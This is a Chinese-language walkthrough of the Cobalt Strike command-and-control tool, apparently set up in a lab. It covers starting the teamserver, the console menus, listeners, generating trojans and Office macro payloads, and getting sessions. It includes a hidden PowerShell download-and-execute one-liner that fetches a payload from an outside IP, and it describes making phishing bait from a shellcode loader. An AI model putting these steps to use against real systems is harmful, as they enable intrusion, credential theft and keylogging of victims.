Cobalt Strike是一个命令和控制的终端工具
默认50050
端口
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。
Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等
设置执行权限
sudo chmod 777 *
sudo ./teamserver
sudo ./teamserver kali的iIP 123456
成功启动后,发现有一串SSL证书的哈希
在win11中双击cs,弹出一个框
对比哈希值以及证书,发现一样,说明正确
正常交换公钥
成功进入cs控制台
1.新建连接
2.断开当前连接
3.监听器
4.改变视图为Pivot Graph(视图列表)
5.改变视图为Session Table(会话列表)
6.改变视图为Target Table(目标列表)
7.显示所有以获取的受害主机的凭证
8.查看已下载文件
9.查看键盘记录结果
10.查看屏幕截图
11.生成无状态的可执行exe木马
12.使用java自签名的程序进行钓鱼攻击
13.生成office宏病毒文件
14.为payload提供web服务以便下载和执行
15.提供文件下载,可以选择Mime类型
16.管理Cobalt Strike上运行的web服务
17.帮助
18.关于
sudo ss -antpl
listeners
6666端口
是用来接收木马反连过来的控制权限sudo ss -antpl
成功生成木马
生成木马成功
成功控制桌面
test用户
点击主机最下面的任务管理器
找到rundll,33990的端口,结束进程
在win11中找到上线的ip,选择Session——remove移除
后缀名为ps1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.63.129:1111/a'))"
目前最火,最为使用的一种上线方式
安装完成
生成好的shellcode需要借助加载器才能变成可执行脚本
鱼饵制作成功
双击鱼饵
上线成功